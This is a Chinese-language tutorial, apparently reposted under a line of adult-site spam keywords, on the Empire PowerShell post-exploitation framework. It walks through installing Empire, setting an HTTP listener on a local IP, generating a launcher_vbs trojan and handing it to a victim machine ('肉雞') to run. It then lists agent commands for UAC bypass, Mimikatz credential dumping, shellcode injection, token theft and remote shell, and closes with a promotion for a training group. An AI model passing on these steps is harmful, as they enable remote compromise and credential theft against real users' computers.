日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

1、Empire工具介紹

Empire是一個PowerShell后期漏洞利用代理工具同時也是一款很強大的后滲透測神器，它建立在密碼學、安全通信和靈活的架構之上。Empire實現了無需powershell.exe就可運行PowerShell代理的功能?？焖俨渴鸷笃诼┒蠢媚K，從鍵盤記錄器到Mimikatz，并且能夠適應通信躲避網絡檢測，所有的這些功能都封裝在一個以實用性為重點的框架中

2、Empire工具安裝

雖然滲透的目標是windows，但Empire本身應該是運行在linux平臺的，首先把程序目錄下載下來：

git clone EmpireProject/Empire

接著就轉進”Empire/setup”目錄，安裝./install.sh。

sudo ./install.sh

3、Empire工具的攻擊利用

執行 sudo ./empire #執行工具操作

執行 listeners #進入監聽列表

如果出現[!] Invalid listener name 那么先執行 uselistener http 選擇http模塊 再執行info 即可， 跳出就back

直接命令

set Name hacker

set Host http://192.168.1.14:443

設置完之后：

然后執行： run #運行監聽。 運行監聽之后生成木馬。 如果沒有run 命令就用 execute 取代run命令

執行：usestager 空格 然后Tab按鍵 會出現

bunny ducky hta launcher_bat launcher_vbs pth_wmis stager war dll hop_php launcher launcher_sct macro scrambled_macro teensy

Windows 就選擇 launcher_bat launcher_vbs 等。。 PHP 就選擇 hop_php

比如我選擇： launcher_vbs

執行：usestager launcher_vbs 監聽列表的名字 #這里就是hacker, hacker就是我剛剛設置的監聽列表名字 （set Listener hacker）

然后執行：info 查看設置配置，木馬腳本放在了 /tmp/launcher.vbs

然后執行：execute #運行 生成木馬，生成成功 然后執行: sudo chmod 777 /tmp/launcher.vbs #賦予可讀可寫權限 然后丟給肉雞運行

生成成功

然后查看肉雞列表 執行命令： agents PS：如果你exit了 也就是退出了 你也可以直接執行agents命令查看肉雞列表

如果要控制肉雞的話：

就執行： interact 肉雞的名字

進入之后 執行幫助 help 查看 肉雞控制器的命令

agents 跳躍的代理人的菜單

back 返回菜單

bypassuac 運行bypassuac，開創一個新的高完整性為監聽代理。產卵<監聽器>

clear 清除代理任務。

creds 從數據庫顯示/返回憑證。

download 任務代理下載文件

exit 任務代理退出

help 顯示菜單或語法for the help特定的命令。

info 顯示有關此代理的信息

injectshellcode listener shellcode inject進入偏遠的過程。前listener米。injectshellcode＜＞＜＞_ PID

jobs 返回工作或殺死一個正在運行的工作

kill 任務殺死特定進程名稱或ID.的代理

killdate 獲取或設置一個代理的killdate（01 / 01 / 2016）。

list 列出所有活動代理（或偵聽器）

listeners 跳轉到監聽器菜單

lostlimit 任務代理更改丟失代理檢測的限制

main 回到主菜單

mimikatz 運行在客戶端- mimikatz Invoke

psinject inject發射器向遠程進程。例如，psinject > <名> < PID

pth 執行一個credid PTH通過Mimikatz。

rename 重命名代理

revtoself 使用憑證/令牌還原令牌權限。

sc 需要截圖，默認是PNG。給一個比率意味著使用JPEG。例SC [ 1 ]

scriptcmd 執行在目前進口PowerShell腳本函數。

scriptimport 進口的PowerShell腳本保存在存儲器中的代理。

searchmodule 模塊搜索帝國名稱/描述。

shell 使用shell命令的代理任務。

sleep 任務代理睡眠間隔[抖動]

spawn 對于給定的聽眾產生一個新的帝國代理名稱。產卵<監聽器>

steal_token 使用憑據/代幣冒充一個令牌的進程ID。

sysinfo 任務獲取系統信息的代理

updateprofile 更新代理連接配置文件

upload 任務代理上傳文件

usemodule 使用一個帝國的PowerShell模塊

workinghours 獲取或設置一個代理的工作時間

執行肉雞命令： shell 你想執行的系統命令

三、結束攻擊

如果你想刪除肉雞：

執行：agents #查看肉雞列表

執行：remove 肉雞名字

如果你想關閉監聽：

首先執行： listeners 查看監聽列表

然后執行： kill 監聽列表的名字 結束掉進程

最后喜歡我文章的朋友請加圈子關注我們，私信關鍵詞：加群。（送免費資料和優惠券）

就會自動分享給你群號。歡迎大家加入我們的安全大家庭。提高大家的安全意識，提升大家的網絡安全技能一直是我們的初衷和愿景，讓我們共同成為守護信息世界的"SaFeMAN"。

還有可以關注我們微信公眾號，在公眾號上輸入安界網，就可以關注到我們，領取資料和優惠券！